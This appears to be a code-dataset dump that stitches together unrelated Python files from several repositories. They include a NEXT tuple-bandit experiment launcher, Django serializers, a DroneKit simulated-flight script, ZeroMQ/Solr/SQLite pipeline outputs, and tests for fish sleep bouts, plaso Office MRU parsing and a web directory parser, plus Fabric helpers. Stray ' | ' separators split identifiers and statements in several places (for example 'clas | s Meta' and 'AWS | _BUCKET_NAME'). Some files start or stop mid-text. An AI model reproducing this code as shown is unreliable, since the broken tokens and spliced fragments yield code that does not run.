DIRPATH = os.path.expanduser("~/Savanna/Data/HowardSprings_IAV/ncdf/spa_hws_inputs.nc")
PKLPATH = os.path.expanduser("~/Savanna/Data/HowardSprings_IAV/pickled/")
main()
|
kgjamieson/NEXT-psych | examples/cartoon_tuple_n25k8/experiment_tuple_n25k8.py | Python | apache-2.0 | 4,671 | 0.004282 | """
author: Lalit Jain, lalitkumarjj@gmail.com
modified: Chris Fernandez, chris2fernandez@gmail.com
last updated: 05/27/2015
A module for replicating the tuple bandits pure exploration experiments from
the NEXT paper, with 25 total arms and 8 arms shown at a time.
Usage:
python experiment_tuple_n25k8.py
"""
import os, sys
# The line below imports launch_experiment.py.
# We assume that it is located in next/examples
# This function is used at the very bottom of this file
sys.path.append("../")
from launch_experiment import *
# List of Algorithms currently available for TupleBandits
curr_dir = os.path.dirname(os.path.abspath(__file__))
experiment_list = []
supported_alg_ids = ['RandomSampling']
# Algorithm List. These algorithms are independent (no inter-connectedness
# between algorithms) and each algorithm gets `proportion` number of queries
# (i.e., if proportions is set to 0.33 for each algorithm, each algorithm will
# sample 1/3 of the time)
alg_list = []
for alg_id in supported_alg_ids:
alg_item = {}
alg_item['alg_id'] = alg_id
alg_item['alg_label'] = alg_id
alg_item['params'] = {}
alg_list.append(alg_item)
# Run algorithms here in fixed proportions
# The number of queries sampled is the ones we specify, rather than using some
# more complicated scheme.
algorithm_management_settings = {}
params = {}
params['proportions'] = []
for algorithm in alg_list:
params['proportions'].append( { 'alg_label': algorithm['alg_label'] , 'proportion':1./len(alg_list) } )
# Algorithms are run here in fixed proportions
algorithm_management_settings['mode'] = 'fixed_proportions'
algorithm_management_settings['params'] = params
# Select some cartoons from the curr_dir
cap_list = ['cap436']
# Create experiment dictionary
for cap in cap_list:
initExp = {}
initExp['args'] = {}
# if cap == cap_list[2]:
# initExp['args']['n'] = 25
# else:
# initExp['args']['n'] = 8
initExp['args']['n'] = 25 # number of targets
initExp['args']['k'] = 8 # how many choices does the user have to choose among?
# probability of error. similar to "significant because p < 0.05"
initExp['args']['failure_probability'] = .01
# one participant sees many algorithms? 'one_to_many' means one participant
# will see many algorithms
initExp['args']['participant_to_algorithm_management'] = 'one_to_many'
initExp['args']['algorithm_management_settings'] = algorithm_management_settings
initExp['args']['alg_list'] = alg_list
# What does the user see at start and finish? These are the
# instructions/debrief (by default they have default values)
# initExp['args']['instructions'] = ''
# initExp['args']['debrief'] =''
initExp['args']['num_tries'] = 1 # how many questions does the user see?
# Which app are we running? (examples of other algorithms are in examples/
# (this is another TupleBandits example)
initExp['app_id'] = 'TupleBanditsPureExploration'
# Set the context
experiment = {}
experiment['initExp'] = initExp
experiment['primary_type'] = 'text'
experiment['primary_target_file'] = curr_dir+"/"+cap+".txt"
experiment['target_file'] = curr_dir+"/"+cap+".txt"
experiment['context'] = curr_dir+"/"+cap+".jpg"
experiment['context_type'] = 'image'
experiment_list.append(experiment)
# Launch the experiment
try:
AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
AWS_ACCESS_ID = os.environ['AWS_ACCESS_KEY_ID']
AWS_BUCKET_NAME = os.environ['AWS_BUCKET_NAME']
host = os.environ['NEXT_BACKEND_GLOBAL_HOST'] + \
":" + os.environ.get('NEXT_BACKEND_GLOBAL_PORT', '8000')
except:
print 'The following environment variables must be defined:'
for key in ['AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY',
'AWS_BUCKET_NAME', 'NEXT_BACKEND_GLOBAL_HOST']:
if key not in os.environ:
print ' ' + key
sys.exit()
# Call launch_experiment module found in NEXT/lauch_experiment.py
exp_uid_list, exp_key_list, widget_key_list = launch_experiment(host, experiment_list, AWS_ACCESS_ID, AWS_SECRET_ACCESS_KEY, AWS | _BUCKET_NAME)
# Update the cartoon_dueling.html file with the exp_uid_list and widget_key_list
# with open('cartoon_tuple_n25k8.html','r') as page:
#     print "opened file"
# page_string = page.read()
# page_string = page_string.replace("{{exp_uid_list}}", str(exp_uid_list))
# page_string = page_string.replace("{{widget_key_list}}", str(widget_key_list))
# with open('../../next_frontend_base/next_frontend_base/templates/cartoon_tuple_n25k8.html','w') as out:
# out.write(page_st | ring)
# out.flush()
# out.close()
|
david2307/backend_159 | communities/serializers.py | Python | gpl-3.0 | 460 | 0.008696 | from rest_framework import serializers
from . | models import Community, Objective, SocialNetwork, Sector
class ObjectiveSerializer(serializers.ModelSerializer):
clas | s Meta:
model = Objective
class CommunitySerializer(serializers.ModelSerializer):
objectives = ObjectiveSerializer(many=True)
class Meta:
model = Community
depth = 1
class SectorSerializer(serializers.ModelSerializer):
class Meta:
model = Sector |
chhsiao1981/f6a_tw_crawler | tests/__init__.py | Python | mit | 147 | 0 | # -*- coding: utf-8 -*-
from f6a_tw_crawl | er.constants | import *
import unittest
import logging
def setup():
pass
def teardown():
pass
|
sassystacks/DASS | Simulation/Test_userInput_roll.py | Python | mit | 5,053 | 0.008114 | from dronekit import connect, VehicleMode, LocationGlobal, LocationGlobalRelative
from pymavlink import mavutil # Needed for command message definitions
from Find_serial_ports import serial_ports
import time
import math
import argparse
parser = argparse.ArgumentParser(description='Control Copter and send commands in GUIDED mode ')
parser.add_argument('--connect',
help="Vehicle connection target string. If not specified, SITL automatically started and used.")
args = parser.parse_args()
connection_string = args.connect
sitl = None
#Start SITL if no connection string specified
if not connection_string:
import dronekit_sitl
sitl = dronekit_sitl.start_default()
connection_string = sitl.connection_string()
# Connect to the Vehicle
print 'Connecting to vehicle on: %s' % connection_string
vehicle = connect(connection_string, wait_ready=True)
def arm_and_takeoff(aTargetAltitude):
"""
Arms vehicle and fly to aTargetAltitude.
"""
print "Basic pre-arm checks"
#Don't let the user try to arm until autopilot is ready
vehicle._ekf_poshorizabs = True
vehicle.mode = VehicleMode("GUIDED")
while not vehicle.is_armable:
print " Waiting for vehicle to initialise..."
print "gps: ", vehicle.gps_0.fix_type
print "EKF: ", vehicle._ekf_poshorizabs
print "VehicleMode: ", vehicle.mode
time.sleep(1)
print "Arming motors"
# Copter should arm in GUIDED mode
vehicle.mode = VehicleMode("GUIDED")
vehicle.armed = True
while not vehicle.armed:
print " Waiting for arming..."
time.sleep(1)
print(vehicle.mode )
print "Taking off!"
vehicle.mode = VehicleMode("GUIDED")
vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude
# Wait until the vehicle reaches a safe height before processing the goto (otherwise the command
# after Vehicle.simple_takeoff will execute immediately).
while True:
print " Altitude: ", vehicle.location.global_relative_frame.alt
print " vehicle mode: ", vehicle.mode
if vehicle.location.global_relative_frame.alt>=aTargetAltitude*0.95: #Trigger just below target alt.
print "Reached target altitude"
break
time.sleep(1)
def send_global_velocity(velocity_x, velocity_y, velocity_z, duration):
"""
Move vehicle in direction based on specified velocity vectors.
This uses the SET_POSITION_TARGET_GLOBAL_INT command with type mask enabling only
velocity components
(http://dev.ardupilot.com/wiki/copter-commands-in-guided-mode/#set_position_target_global_int).
Note that from AC3.3 the message should be re-sent every second (after about 3 seconds
with no message the velocity will drop back to zero). In AC3.2.1 and earlier the specified
velocity persists until it is canceled. The code below should work on either version
(sending the message multiple times does not cause problems) | .
See the above link for information on the type_mask (0=enable, 1=ignore).
At time of writing, acceleration a | nd yaw bits are ignored.
"""
msg = vehicle.message_factory.set_position_target_global_int_encode(
0, # time_boot_ms (not used)
0, 0, # target system, target component
mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT, # frame
0b0000111111000111, # type_mask (only speeds enabled)
0, # lat_int - X Position in WGS84 frame in 1e7 * meters
0, # lon_int - Y Position in WGS84 frame in 1e7 * meters
0, # alt - Altitude in meters in AMSL altitude(not WGS84 if absolute or relative)
# altitude above terrain if GLOBAL_TERRAIN_ALT_INT
velocity_x, # X velocity in NED frame in m/s
velocity_y, # Y velocity in NED frame in m/s
velocity_z, # Z velocity in NED frame in m/s
0, 0, 0, # afx, afy, afz acceleration (not supported yet, ignored in GCS_Mavlink)
0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)
# send command to vehicle on 1 Hz cycle
for x in range(0,duration):
vehicle.send_mavlink(msg)
time.sleep(1)
def update_pos():
print(vehicle.location.local_frame)
print "vehicle heading: ", vehicle.heading
print "clock time: ", time.time()
current_North= vehicle.location.local_frame.north
current_East = vehicle.location.local_frame.east
    current_alt = -vehicle.location.local_frame.down  # NED frame: altitude is -down
# Arm and take off to an altitude of 4 meters
arm_and_takeoff(4)
update_pos()
time.sleep(2)
duration_entered = 2
roll1 = 3
send_global_velocity(0,roll1,0,duration_entered)
print"roll1 velocity: ", roll1
update_pos()
send_global_velocity(0,0,0,duration_entered)
update_pos()
time.sleep(2)
print("Setting LAND mode...")
vehicle.mode = VehicleMode("LAND")
# Close vehicle object before exiting script
print "Close vehicle object"
vehicle.close()
|
jbruce12000/septic-tank | septic_tank/outputs.py | Python | mit | 9,478 | 0.007597 | from pipeline import Pipe
from pysolr import Solr
import json
import logging
import sys
import time
import zmq
import sqlite3 as lite
from collections import defaultdict
class Output(Pipe):
def data_invalid(self,data):
if 'type' not in data:
return True
if len(data.keys()) < 2:
return True
return False
class STDOutput(Output):
'''
output that prints data to stdout
'''
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
print data
sys.stdout.flush()
return data
class JSONOutput(Output):
def __init__(self, **hints):
self.hints = hints
super(JSONOutput, self).__init__()
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
print json.dumps(data,**self.hints)
sys.stdout.flush()
return data
class ZeroMQOutput(Output):
def __init__(self,host='127.0.0.1', port='8001', zmq_socket_type=zmq.REQ):
super(ZeroMQOutput, self).__init__()
self.host = host
self.port = port
self.addr = 'tcp://%s:%s' % (host,port)
self.context = zmq.Context()
        self.zmq_socket_type = zmq_socket_type
        self.socket = self.context.socket(zmq_socket_type)
self.socket.connect(self.addr)
self.poller = zmq.Poller()
# zmq.POLLIN|zmq.POLLOUT
self.poller.register(self.socket, zmq.POLLIN)
def reconnect(self):
logging.warn('%s reconnecting to %s' % (type(self),self.addr))
self.socket.close()
self.context.term()
self.context = zmq.Context()
        self.socket = self.context.socket(self.zmq_socket_type)
self.socket.connect(self.addr)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
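    # REQ sockets must alternate send/recv in lockstep; if a reply never
    # arrives the socket is wedged, so execute() polls with a timeout and
    # rebuilds the socket via reconnect() on any failure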
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
msg = json.dumps(data,separators=(',',':'))
try:
self.socket.send(msg,zmq.NOBLOCK)
except Exception,err:
logging.error('zeromq socket send error: %s' % str(err))
self.reconnect()
return None
# if the server disconnects, reconnect in one second
socks = dict(self.poller.poll(1000))
if socks:
try:
ignore = self.socket.recv()
return data
except Exception,err:
logging.error('zeromq socket recv error: %s' % str(err))
# if I get here something bad happened. reconnect.
self.reconnect()
return None
class ZeroMQParentParallelOutput(Output):
'''
An output used to load balance records across multiple processes.
This is used by the parent process to get data to the children in
load balanced fashion.
'''
def __init__(self, host='*', port=6666):
super(ZeroMQParentParallelOutput, self).__init__()
self.host = host
self.port = port
self.addr = 'tcp://%s:%s' % (host,port)
self.context = zmq.Context()
self.socket = self.context.socket(zmq.PUSH)
self.socket.bind(self.addr)
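        # PUSH sockets round-robin outgoing messages across all connected
        # PULL workers, which provides the load balancing described above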
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
msg = json.dumps(data,separators=(',',':'))
try:
self.socket.send(msg)
except Exception,err:
logging.error('zeromq socket send error: %s' % str(err))
return None
return data
class ZeroMQChildParallelOutput(Output):
'''
An output used to return data from multiple parallel processes to
the parent.
'''
def __init__(self, host='127.0.0.1', port=6667):
super(ZeroMQChildParallelOutput, self).__init__()
self.host = host
self.port = port
self.addr = 'tcp://%s:%s' % (host,port)
self.context = zmq.Context()
self.socket = self.context.socket(zmq.PUSH)
self.socket.connect(self.addr)
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
msg = json.dumps(data,separators=(',',':'))
try:
self.socket.send(msg)
except Exception,err:
logging.error('zeromq socket send error: %s' % str(err))
return None
return data
class SOLROutput(Output):
def __init__(self,solrurl,commitrate=10000,typemap={}):
super(SOLROutput, self).__init__()
self.solrurl = solrurl
self.conn = Solr(self.solrurl)
self.commitrate = commitrate
self.solrcache = []
self.commityet = 0
self.typemap = typemap
# post 0 docs to solr:
# 1. verify we can post to solr
# 2. load libs for __del__
self.commit_to_solr()
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
if self.data_invalid(data):
logging.debug('data is invalid %s' % data)
return None
solrdata = {}
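        # map each field to a Solr dynamic-field name: honour an explicit
        # typemap suffix, pass 'id' and 'msg' through unchanged, and default
        # everything else to the '_t' (text) dynamic field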
for key in data:
if key in self.typemap:
skey = "%s%s" % (key,self.typemap[key])
elif key == 'id':
skey = key
elif key == 'msg':
skey = key
else:
skey = "%s_t" % key
solrdata[skey] = data[key]
self.solrcache.append(solrdata)
self.commityet += 1
# commit every once and a while
if(self.commityet >= self.commitrate):
self.commit_to_solr()
# required at end of pipeline
return data
def commit_to_solr(self):
logging.debug('adding %d docs to solr' % self.commityet)
try:
self.conn.add(self.solrcache)
self.commityet = 0
self.solrcache = []
except Exception, err:
# if solr is down, this fails at a rate of about 1/s until
# solr comes back up. the backlog in the cache then gets
# written.
logging.error('solr cache size: %d' % len(self.solrcache))
logging.error('solr add error: %s' % str(err))
time.sleep(1);
return None
def __del__(self):
self.commitrate = 0
logging.debug('shutting down, clearing cache to solr')
self.commit_to_solr()
class SQLiteOutput(Output):
# FIX - needs to handle uniq id as docid???
def __init__(self,pa | th="ft.db",commitrate=10000):
super(SQLiteOutput, self).__init__()
self.path = path
self.commitrate = commitrate
self.sqlitecache = defaultdict(list)
self.commityet = 0
self.tables = {};
def create_table_sql_for(self,data):
| columns=",".join(data.keys())
#return "create virtual table %s using fts4(%s)" % (data['type'],columns)
return "create table if not exists %s (%s)" % (data['type'],columns)
def create_insert_sql_for(self,data):
columns = sorted(data.keys())
return "insert into %s (%s) values (%s)" % (data['type'],','.join(columns),','.join("?" for x in columns))
def create_insert_tuple_for(self,data):
values = []
for key in sorted(data.iterkeys()):
if data[key]:
values.append(unicode(data[key], errors='ignore'))
else:
values.append(unicode("", errors='ignore'))
return values
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
if self.data_invalid(data):
logging.debug('data is invalid %s' % data)
return None
# create table sql
if data['type'] not in self.tables:
            self.tables[data['type']] = self.create_table_sql_for(data)
# this is a defaultdict like this...
# "insert into table (col1,col2) values (?,?)" => [(1,2),(3,4)]
sql = self.create_insert_sql_for(data)
self.sqlitecache[sql].append(self.create_insert_tuple_for(data))
self.commityet += 1
# commit every once and a while
if(self.commityet >= self.commitrate):
self.commit_to_sqlite()
# required at end of pipeline
|
justinbois/fish-activity | tests/test_summarize.py | Python | mit | 4,743 | 0.001265 | import pytest
import numpy as np
import pandas as pd
from pandas.util.testing import assert_frame_equal
import fishact
def test_sleep_latency():
df = pd.DataFrame({'zeit': np.linspace(0.0, 19.0, 20),
'sleep': np.ones(20, dtype=int)})
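    # _sleep_latency measures the time from the first awake minute to the
    # next sleep onset; a fish that sleeps throughout or never sleeps has
    # no defined latency (NaN)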
assert np.isnan(fishact.summarize._sleep_latency(df))
df.loc[6, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 1.0)
df.loc[7, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 2.0)
df.loc[5, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 3.0)
df.loc[15, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 3.0)
df.loc[0:15, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 16.0)
df['sleep'] = np.zeros(len(df))
assert np.isnan(fishact.summarize._sleep_latency(df))
def test_compute_bouts():
df = pd.DataFrame({'zeit': np.linspace(0.0, 19.0, 20),
'sleep': np.ones(20, dtype=int),
'time': pd.to_datetime(['2017-03-30 14:00:00',
'2017-03-30 14:01:00',
'2017-03-30 14:02:00',
'2017-03-30 14:03:00',
'2017-03-30 14:04:00',
'2017-03-30 14:05:00',
'2017-03-30 14:06:00',
'2017-03-30 14:07:00',
'2017-03-30 14:08:00',
'2017-03-30 14:09:00',
'2017-03-30 14:10:00',
| '2017-03-30 14:11:00',
'2017-03-30 14:12:00',
'2017-03-30 14:13:00 | ',
'2017-03-30 14:14:00',
'2017-03-30 14:15:00',
'2017-03-30 14:16:00',
'2017-03-30 14:17:00',
'2017-03-30 14:18:00',
'2017-03-30 14:19:00']),
'light': [True]*20,
'day': [5]*20})
correct_df = pd.DataFrame(
columns=['day_start', 'day_end', 'light_start', 'light_end',
'bout_start_zeit', 'bout_end_zeit',
'bout_start_clock', 'bout_end_clock', 'bout_length'])
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df)
df['sleep'] = np.array([0]*5 + [1]*15,dtype=int)
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df)
df['sleep'] = np.array([1]*5 + [0]*15,dtype=int)
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df)
df['sleep'] = np.array([0]*3 + [1]*4 + [0]*13,dtype=int)
correct_df = correct_df.append(
{'day_start': 5,
'day_end': 5,
'light_start': True,
'light_end': True,
'bout_start_zeit': 3.0,
'bout_end_zeit': 7.0,
'bout_start_clock': pd.to_datetime('2017-03-30 14:03:00'),
'bout_end_clock': pd.to_datetime('2017-03-30 14:07:00'),
'bout_length': 4.0}, ignore_index=True)
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df,
check_dtype=False)
df['sleep'] = np.array([0]*3 + [1]*4 + [0] + [1]*12, dtype=int)
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df,
check_dtype=False)
df['sleep'] = np.array([0]*3 + [1]*4 + [0]*2 + [1]*10 + [0],dtype=int)
correct_df = pd.DataFrame(
{'day_start': [5, 5],
'day_end': [5, 5],
'light_start': [True, True],
'light_end': [True, True],
'bout_start_zeit': [3.0, 9.0],
'bout_end_zeit': [7.0, 19.0],
'bout_start_clock': pd.to_datetime(['2017-03-30 14:03:00',
'2017-03-30 14:09:00']),
'bout_end_clock': pd.to_datetime(['2017-03-30 14:07:00',
'2017-03-30 14:19:00']),
'bout_length': [4.0, 10.0]})
correct_df = correct_df.sort_index(axis=1)
assert_frame_equal(fishact.summarize._compute_bouts(df).sort_index(axis=1),
correct_df, check_dtype=False)
|
qedsoftware/commcare-hq | corehq/ex-submodules/casexml/apps/case/tests/test_out_of_order_processing.py | Python | bsd-3-clause | 1,076 | 0 | import os
from django.test.utils import override_settings
fr | om django.test import TestCase
from casexml.apps.case.tests.util import delete_all_cases
from corehq.apps.receiverwrapper.util import submit_form_locally
from corehq.form_processor.interfaces.dbaccessors import CaseAccessors
@override_settings(CASEXML_FORCE_DOMAIN_CHECK=False)
class OutOfO | rderCaseTest(TestCase):
def setUp(self):
super(OutOfOrderCaseTest, self).setUp()
delete_all_cases()
def testOutOfOrderSubmissions(self):
dir = os.path.join(os.path.dirname(__file__), "data", "ordering")
for fname in ('update_oo.xml', 'create_oo.xml'):
with open(os.path.join(dir, fname), "rb") as f:
xml_data = f.read()
submit_form_locally(xml_data, 'test-domain')
case = CaseAccessors().get_case('30bc51f6-3247-4966-b4ae-994f572e85fe')
self.assertEqual('from the update form', case.pupdate)
self.assertEqual('from the create form', case.pcreate)
self.assertEqual('overridden by the update form', case.pboth)
|
cblair/docset_from_html | get_plist_text.py | Python | mit | 959 | 0.006257 | #!/usr/bin/env python3
def get_plist_text(cf_bundler_identifier, cf_bundle_name=None,
docset_platform_family=None):
"""TODO"""
cf_bundle_name = cf_bundle_name or cf_bundler_identifier.upper()
docset_platform_family = docset_platform_family or cf_bundle_name.upper()
return """
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleIdentifier</key>
<string>{cf_bundler_iden | tifier}</string>
<key>CFBundleName</key>
<string>{cf_bundle_name}</string>
<key>DocSetPlatformFamily</key>
<string>{docset_platform_family}</string>
<key>isDashDocset</key>
<true/>
</dict>
</plist>""".format(cf_bundler_identifier=cf_bundler_identifier,
cf_bundle_name=cf_bundle_name,
docset_platform_family=docs | et_platform_family) |
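# Illustrative usage (the identifier below is an arbitrary example):
#     print(get_plist_text('requests', cf_bundle_name='Requests'))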
allisonrandal/openstack-spec-tracker | spectracker/pagerender.py | Python | apache-2.0 | 1,658 | 0 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from datetime import datetime
from jinja2 import Environment
from jinja2 import FileSystemLoader
import os.path
def render_keytopics(template_dir, output_dir, topics, cycle):
template_file = "keytopics.html"
template_env = Environment(loader=FileSystemLoader(template_dir))
keytopics_tmpl = template_env.get_template(template_file)
output_file = os.path.join(output_dir, template_file)
with open(output_file, 'w') as fh:
fh.write(keytopics_tmpl.render(series=cycle,
| date=str(datetime.utcnow()),
frequency=topics))
def render_spec_list(template_dir, output_dir, spec_list):
template_file = "specifications | .html"
template_env = Environment(loader=FileSystemLoader(template_dir))
keytopics_tmpl = template_env.get_template(template_file)
output_file = os.path.join(output_dir, template_file)
with open(output_file, 'w') as fh:
fh.write(keytopics_tmpl.render(date=str(datetime.utcnow()),
specset=spec_list))
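# Illustrative usage (the arguments are made-up examples):
#     render_spec_list('templates', 'output', [{'name': 'example-spec'}])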
|
harun-emektar/webfs | tests/Test_WebDirParser.py | Python | apache-2.0 | 1,416 | 0.011299 | from webfs import WebDirParser
testDoc = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /ubuntu</title>
</head>
<body>
<h1>Index of /ubuntu</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a> <a href=" | ?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr><img src="/icons/back.gif" alt="[DIR]"> <a href="/ | ">Parent Directory</a> -
<img src="/icons/folder.gif" alt="[DIR]"> <a href="dists/">dists/</a> 18-Jun-2014 12:46 -
<img src="/icons/folder.gif" alt="[DIR]"> <a href="indices/">indices/</a> 28-Apr-2008 17:47 -
<img src="/icons/compressed.gif" alt="[ ]"> <a href="ls-lR.gz">ls-lR.gz</a> 28-Apr-2008 16:05 4.5M
<img src="/icons/folder.gif" alt="[DIR]"> <a href="pool/">pool/</a> 14-Jan-2008 22:05 -
<img src="/icons/folder.gif" alt="[DIR]"> <a href="project/">project/</a> 28-Jun-2013 11:52 -
<hr></pre>
<address>Apache/2.2.22 (Ubuntu) Server at old-releases.ubuntu.com Port 80</address>
</body></html>
"""
def Test_ParsingTest():
wp = WebDirParser()
wp.feed(testDoc)
assert len(wp.entries) == 5
    assert sorted(wp.entries.keys()) == sorted(['dists', 'indices', 'ls-lR.gz', 'pool', 'project']),\
wp.entries.keys() |
dc3-plaso/plaso | tests/parsers/winreg_plugins/officemru.py | Python | apache-2.0 | 3,793 | 0.001318 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the Microsoft Office MRUs Windows Registry plugin."""
import unittest
from plaso.formatters import officemru # pylint: disable=unused-import
from plaso.formatters import winreg # pylint: disable=unused-import
from plaso.lib import eventdata
from plaso.lib import timelib
from plaso.parsers.winreg_plugins import officemru
from tests import test_lib as shared_test_lib
from tests.parsers.winreg_plugins import test_lib
__author__ = 'David Nides (david.nides@gmail.com)'
class OfficeMRUPluginTest(test_lib.RegistryPluginTestCase):
"""Tests for the Microsoft Office MRUs Windows Registry plugin."""
@shared_test_lib.skipUnlessHasTestFile([u'NTUSER-WIN7.DAT'])
def testProcess(self):
"""Tests the Process function."""
test_file_entry = self._GetTestFileEntry([u'NTUSER-WIN7.DAT'])
key_path = (
u'HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\'
u'File MRU')
win_registry = self._GetWinRegistryFromFileEntry(test_file_entry)
registry_key = win_registry.GetKeyByPath(key_path)
plugin_object = officemru.OfficeMRUPlugin()
storage_writer = self._ParseKeyWithPlugin(
registry_key, plugin_object, file_entry=test_file_entry)
self.assertEqual(len(storage_writer.events), 6)
event_object = storage_writer.events[5]
self.assertEqual(event_object.pathspec, test_file_entry.path_spec)
# This should just be the plugin name, as we're invoking it directly,
# and not through the parser.
self.assertEqual(event_object.parser, plugin_object.plugin_name)
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2012-03-13 18:27:15.089802')
self.assertEqual(event_object.timestamp, expected_timestamp)
self.assertEqual(
event_object.timestamp_desc, eventdata.EventTimestamp.WRITTEN_TIME)
regvalue_identifier = u'Item 1'
expected_value_string = (
u'[F00000000][T01CD0146EA1EADB0][O00000000]*'
u'C:\\Users\\nfury\\Documents\\StarFury\\StarFury\\'
u'SA-23E Mitchell-Hyundyne Starfury.docx')
self._TestRegvalue(event_object, regvalue_identifier, expected_value_string)
expected_message = (
u'[{0:s}] '
u'{1:s}: {2:s} '
u'Item 2: [F00000000][T01CD00921FC127F0][O00000000]*'
u'C:\\Users\\nfury\\Documents\\StarFury\\StarFury\\Earthforce SA-26 '
u'Thunderbolt Star Fury.docx '
u'Item 3: [F00000000][T01CD009208780140][O00000000]*'
u'C:\\Users\\nfury\\Documents\\StarFury\\StarFury\\StarFury.docx '
u'Item 4: [F00000000][T01CCFE0B22DA9EF0][O00000000]*'
u'C:\\Users\\nfury\\Documents\\VIBRANIUM.docx '
u'Item 5: [F00000000][T01CCFCBA595DFC30][O00000000]*'
u'C:\\Users\\nfury\\Documents\\ADAMANTIUM-Background.docx').format(
key_path, regvalue_identifier, expected_value_string)
expected_short_message = u'{0:s}...'.format(expected_message[0:77])
self._TestGetMessageStrings(
event_object, expected_message, expected_short_message)
# Test OfficeMRUWindowsRegistryEvent.
event_object = storage_writer.events[0]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2012-03-13 18:27:15.083')
self.assertEqual(event_object.timestamp, expected_timestamp)
self.assertEqual(
event_object.timestamp_desc, eventdata.EventTimestamp.WRITTEN_ | TIME)
self.assertEqual(event_object.value_string, expected_value_string)
expected_message = u'[{0:s}] Value: {1:s}'.format(
key_path, expected_value_string)
expected_short_message = u'{0:s}...'.format(expected_value_string[0:77])
self._TestGetM | essageStrings(
event_object, expected_message, expected_short_message)
if __name__ == '__main__':
unittest.main()
|
apavlo/h-store | third_party/python/fabric/utils.py | Python | gpl-3.0 | 4,636 | 0.000431 | """
Internal subroutines for e.g. aborting execution with an error message,
or performing indenting on multiline output.
"""
import sys
import textwrap
def abort(msg):
"""
    Abort execution, print ``msg`` to stderr and exit with error status (1).
This function currently makes use of `sys.exit`_, which raises
`SystemExit`_. Therefore, it's possible to detect and recover from inner
calls to `abort` by using ``except SystemExit`` or similar.
.. _sys.exit: http://docs.python.org/library/sys.html#sys.exit
.. _SystemExit: http://docs.python.org/library/exceptions.html#exceptions.SystemExit
"""
from fabric.state import output
if output.aborts:
print >> sys.stderr, "\nFatal error: " + str(msg)
print >> sys.stderr, "\nAborting."
sys.exit(1)
def warn(msg):
"""
Print warning message, but do not abort execution.
This function honors Fabric's :doc:`output controls
<../../usage/output_controls>` and will print the given ``msg`` to stderr,
provided that the ``warnings`` output level (which is active by default) is
turned on.
"""
from fabric.state import output
if output.warnings:
print >> sys.stderr, "\nWarning: %s\n" % msg
def indent(text, spaces=4, strip=False):
"""
Return ``text`` indented by the given number of spaces.
If text is not a string, it is assumed to be a list of lines and will be
joined by ``\\n`` prior to indenting.
When ``strip`` is ``True``, a minimum amount of whitespace is removed from
the left-hand side of the given string (so that relative indents are
preserved, but otherwise things are left-stripped). This allows you to
effectively "normalize" any previous indentation for some inputs.
"""
# Normalize list of strings into a string for dedenting. "list" here means
# "not a string" meaning "doesn't have splitlines". Meh.
if not hasattr(text, 'splitlines'):
text = '\n'.join(text)
# Dedent if requested
if strip:
text = textwrap.dedent(text)
prefix = ' ' * spaces
output = '\n'.join(prefix + line for line in text.splitlines())
# Strip out empty lines before/aft
output = output.strip()
# Reintroduce first indent (which just got stripped out)
output = prefix + output
return output
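# For example, indent("foo\nbar", spaces=2) returns "  foo\n  bar".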
def puts(text, show_prefix=True, end="\n", flush=False):
"""
An alias for ``print`` whose output is managed by Fabric's output controls.
In other words, this function simply prints to ``sys.stdout``, but will
hide its output if the ``user`` :doc:`output level
</usage/output_controls>` is set to ``False``.
If ``show_prefix=False``, `puts` will omit the leading ``[hostname]``
which it tacks on by default. (It will also omit this prefix if
``env.host_string`` is empty.)
Newlines may be disabled by setting ``end`` to the empty string (``''``).
(This intentionally mirrors Python 3's ``print`` syntax.)
You may force output flushing (e.g. to bypass output buffering) by setting
``flush=True``.
.. versionadded:: 0.9.2
.. seealso:: `~fabric.utils.fastprint`
"""
from fabric.state import output, env
if output.user:
prefix = ""
if env.host_string and show_prefix:
prefix = "[%s] " % env.host_string
sys.stdout.write(prefix + str(text) + end)
if flush:
sys.stdout.flush()
def fastprint(text, show_prefix=False, end="", flush=True):
"""
Print ``text`` immediately, without any prefix or line ending.
This function is simply an alias of `~fabric.utils.puts` with different
default argument values, such that the ``text`` is printed without any
embellishment and immediately flushed.
It is useful for any situation where you wish to print text which might
